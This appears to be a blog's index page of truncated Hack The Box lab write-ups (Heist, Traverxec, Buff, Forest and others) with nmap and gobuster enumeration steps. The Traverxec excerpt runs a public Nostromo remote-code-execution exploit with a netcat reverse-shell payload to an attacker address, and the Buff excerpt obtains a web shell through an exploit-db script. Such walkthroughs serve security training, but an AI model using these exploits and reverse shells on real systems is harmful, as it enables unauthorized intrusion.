Pages

Search

HTB Heist

$nmap -sC -sV -oA all -vv -p- 10.10.10.149 $gobuster dir -u http://10.10.10.149 -w ~/tools/SecLists/Discovery/Web-Content/raft-medium-directories.txt -e $gobuster dir -u http://10.10.10.149 -w ~/tools/SecLists/Discovery/Web-Content/raft-large-files.txt -e -k php Accessing to http://10.10.10.149/login.php There is a «Login as Guest» option. http://10.10.10.149/issues.php There is an «Attachment» link. http://10.10.10.149/attachments/config.txt The message talks about a Cisco Router. Hazard said to create a user account for him. So it should be a «hazard» username. Testing admin credentials we’ve just found. we need an

Kali Linux 2021.1 Released

The new Kali 2021.1 version has been recently released. The official post can be found here:https://www.kali.org/blog/kali-linux-2021-1-release/ The summary of the news are: Xfce 4.16 – Our preferred and current default desktop environment has been updated and tweaked KDE 5.20 – Plasma also received a version bump Terminals – mate-terminal, terminator and tilix all had various work carried out on them Command Not Found – A helping hand to say if

HTB Traceback

$nmap -A -T4 -p- 10.10.10.181 Open ports: 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 80/tcp open http Apache httpd 2.4.29 Access to http://10.10.10.181 Can we assume that there is a Web-shell in this box? Let’s try to find out. $gobuster dir -u http://10.10.10.181 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e With our usual wordlist, there aren’t interesting results. Let’s try a different one taking into account the comment of the main site that talked about web-shells… $gobuster dir

HTB Traverxec

$nmap -T4 -A -p- 10.10.10.165 Open ports: 22/tcp open ssh OpenSSH 7.9p1 Debian 80/tcp open http nostromo 1.9.6 Nostromo v1.9.6 web server (http://www.nazgul.ch/dev_nostromo.html) $searchsploit nostromo Our web server is vulnerable to an RCE… 🙂 $searchsploit -m 47837 $python 47837.py 10.10.10.165 80 «nc -e bash 10.10.14.15 1234″$nc -lnvp 1234 whoami python3 -c «import pty;pty.spawn(‘/bin/bash’)» We are www-data, let’s enumerate a little bit. www-data@traverxec:/var/nostromo/conf$ ls -la www-data@traverxec:/var/nostromo/conf$ cat .htpasswd $chmod 600 david.key$ssh -i david.key david@10.10.10.165

HTB Bastion

$nmap -A -p- -T4 10.10.10.134 Open ports: 22/tcp open ssh OpenSSH for_Windows_7.9 (protocol 2.0) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) 47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) 49664/tcp open msrpc Microsoft Windows RPC 49665/tcp open msrpc Microsoft Windows RPC 49666/tcp open msrpc Microsoft Windows RPC 49667/tcp

HTB Forest

$ forest nmap -T4 -A -p- 10.10.10.161 Open ports: We have an Active Directory LDAP server Domain Controller: htb.local OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3) Domain name: htb.local Forest name: htb.local FQDN: FOREST.htb.local To start with the box enumeration we can use JXplorer. JXplorer is a cross platform LDAP browser and editor. It is a standards compliant general purpose LDAP client that can be used

HTB Buff

$ nmap -A -T4 -p- 10.10.10.198 -Pn $ gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt dir -u http://10.10.10.198:8080 -e Access to http://10.10.10.198:8080/ From this home site page: Access to https://projectworlds.in There is a list of different projects. Here you will find this one: https://projectworlds.in/free-projects/php-projects/gym-management-system-project-in-php/ From this site, you can download the whole project. $ searchsploit Gym Management System 1.0 Using this exploit (https://www.exploit-db.com/exploits/48506): $ python2.7 48506.py http://10.10.10.198:8080/ C:\xampp\htdocs\gym\upload> whoami C:\xampp\htdocs\gym\upload> dir A web shell

HTB Curling

$ nmap -T4 -A -p- 10.10.10.150 $ gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt dir -u http://10.10.10.150 -e If we access to http://10.10.10.150/administrator/, we’ll find a Joomla login form. Accessing to http://10.10.10.150, Based on the published post there are these users: Super User Floris Watching on the source code, there is a suspicious secret.txt file somewhere. http://10.10.10.150/secret.txt This string seems to be encoded. Searching for: «linux decode string», Google give us the suggestion of

HTB Postman

$ nmap -A -p- -T4 10.10.10.160 Open ports: 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) 6379/tcp open redis Redis key-value store 4.0.9 10000/tcp open http MiniServ 1.910 (Webmin httpd) $ gobuster dir -u http://10.10.10.160 -w Access to http://10.10.10.160 Access to http://10.10.10.160:10000 Access to https://10.10.10.160:1000 Redis is an open source (BSD licensed), in-memory data structure store, used as a database, cache and

HTB Writeup

$ nmap -A -T4 -p- -sV 10.10.10.138 Although nmap says port 80 is open, it also appears to be as tcpwrapped.What does it mean? Tcpwrapped refers to tcpwrapper, a host-based network access control program on Unix and Linux. When Nmap labels something tcpwrapped, it means that the behavior of the port is consistent with one that is protected by tcpwrapper. Specifically, it means that a full TCP handshake was completed,